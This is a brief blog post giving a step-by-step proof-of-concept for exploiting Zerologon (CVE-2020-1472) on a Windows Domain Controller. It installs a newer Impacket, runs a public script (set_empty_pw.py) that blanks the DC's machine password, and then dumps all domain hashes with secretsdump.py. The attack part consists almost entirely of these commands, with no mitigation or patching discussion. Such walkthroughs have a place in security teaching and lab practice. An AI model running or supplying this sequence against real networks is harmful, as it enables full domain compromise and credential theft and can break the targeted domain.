CVE-2020-1472 Zerologon Exploit POC

November 11, 2020

Zerologon Exploit

Yet another Zerologon Exploit POC. We will be exploiting a vulnerable Domain Controller.

Impacket 0.9.22

At the time of this writing, we need to use an updated version of Impacket 0.9.22 or newer for this exploit to work. The current stable version of Impaket is 0.9.21.

Current impacket stable version

But before you install a new Impacket, you might want to create a vm snapshot before things go completely wrong. Alternatively, you can install Impacket in a docker and run as well. You can learn more about it in this post. But for the sake of this post, we will just install on our VM.

After creating a VM snapshot, remove any existing Impacket installation with the following command:


> apt remove --purge impacket-scripts python3-impacket

Here is the link to the Impacket newer version: Impacket Link

Impacket 0.9.22

> git clone https://github.com/SecureAuthCorp/impacket.git

> cd impacket

> pip install .

Exploitaion

We will be using a script from Risksense

> git clone https://github.com/risksense/zerologon.git

> cd zerologon

And now run the script against the Domain Controller:

> python3 set_empty_pw.py <DC-NAME> <ip-address>

running set_empty_pw.py

If the script ran successfully, there should be no password for the DC after that.

Dumping hashes from DC

> secretsdump.py -just-dc <DC-NAME>\$@10.10.10.1

Hash dumping with secretdump.py

And that’s it. It’s very easy to exploit. Hope you guys enjoyed it.

If you want to learn more about this exploit, Heath (TCM) has done a great video explaining about it. Here is the video: ZeroLogon Exploit - Abusing CVE-2020-1472 (Way Too Easy!)

hum4nG0D

CVE-2020-1472 Zerologon Exploit POC

Impacket 0.9.22

Exploitaion

Dumping hashes from DC

You may also enjoy

Running Cyberchef Locally with Docker

Command-line ChatGPT Python Script Coded by ChatGPT

CVE-2021-44228 Log4j Exploit - Log4Shell

DIY RubberDucky Wifi Passwords Stealer